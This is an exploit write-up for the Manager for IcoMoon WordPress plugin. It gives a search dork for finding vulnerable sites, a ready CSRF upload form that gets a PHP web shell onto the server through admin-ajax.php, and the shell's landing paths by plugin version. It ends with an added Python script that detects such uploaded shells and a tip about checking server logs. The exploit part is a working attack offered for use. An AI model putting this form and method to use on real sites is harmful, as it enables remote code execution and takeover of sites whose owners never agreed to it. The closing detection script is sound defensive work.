Reference: Wordfence
Dork: inurl:/wp-content/plugins/manager-for-icomoon
Preparations:
- A zip archive that contains your-shell.php
- The CSRF form (below)
CSRF

<form method="post" action="http://localhost/wp-admin/admin-ajax.php" enctype="multipart/form-data">
  <input type="hidden" name="action" value="admin_menu">
  <input type="file" name="managerforicomoon-zip">
  <input type="submit" value="Upload" name="managerforicomoon-upload">
</form>

* Upload your compressed zip shell
Uploaded file

Plugin version 2.0: the uploaded file lands in /wp-content/uploads/manager-for-icomoon/shell.php
Plugin version above 2.0: the uploaded file lands in /wp-content/plugins/manager-for-icomoon/icomoon/shell.php

* Check the plugin version in /wp-content/plugins/manager-for-icomoon/readme.txt
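Defender-side check, added here and not part of the original write-up: it reads the plugin's readme.txt (the "Stable tag:" line is assumed to hold the version), maps the version to the drop directory named above, and lists any PHP-executable files sitting there, which is where an abused upload would show up.

```python
import re
import tempfile
from pathlib import Path

# Paths quoted in the write-up, relative to the WordPress root.
README = Path("wp-content/plugins/manager-for-icomoon/readme.txt")
DIR_EQ_2_0 = Path("wp-content/uploads/manager-for-icomoon")
DIR_GT_2_0 = Path("wp-content/plugins/manager-for-icomoon/icomoon")
# Extensions a typical PHP handler will execute; none belong in an icon-set directory.
PHP_EXT = {".php", ".phtml", ".phar", ".php5", ".php7"}

def plugin_version(readme_text):
    """Read the 'Stable tag:' line of the plugin readme.txt (assumed WordPress readme field)."""
    m = re.search(r"^\s*Stable tag:\s*(\S+)", readme_text, re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None

def expected_upload_dir(version):
    """Map the version to the drop directory the write-up gives; None where it says nothing."""
    try:
        parts = tuple(int(p) for p in version.split("."))
    except (AttributeError, ValueError):
        return None
    key = parts[:2] if all(x == 0 for x in parts[2:]) else parts   # treat 2.0.0 as 2.0
    if key == (2, 0):
        return DIR_EQ_2_0
    return DIR_GT_2_0 if key > (2, 0) else None

def scan(wp_root):
    """Return (version, [suspicious files relative to wp_root]) for one WordPress install."""
    readme = wp_root / README
    if not readme.is_file():
        return None, []                      # plugin not installed
    version = plugin_version(readme.read_text(errors="replace"))
    drop_dir = expected_upload_dir(version)
    if drop_dir is None or not (wp_root / drop_dir).is_dir():
        return version, []
    hits = sorted(p.relative_to(wp_root) for p in (wp_root / drop_dir).rglob("*")
                  if p.is_file() and p.suffix.lower() in PHP_EXT)
    return version, [h.as_posix() for h in hits]

def demo():
    """Constructed install: version 2.0 plus one planted PHP file beside a legitimate SVG."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / README).parent.mkdir(parents=True)
        (root / README).write_text("=== Manager for IcoMoon ===\nStable tag: 2.0\n")
        (root / DIR_EQ_2_0).mkdir(parents=True)
        (root / DIR_EQ_2_0 / "shell.php").write_text("<?php /* constructed sample */ ?>")
        (root / DIR_EQ_2_0 / "icons.svg").write_text("<svg/>")
        return scan(root)

if __name__ == "__main__":
    print(demo())
```

Run it against a real install with scan(Path("/var/www/html")); any hit is worth pulling the admin-ajax.php POST with action=admin_menu from the web server log for the same time window.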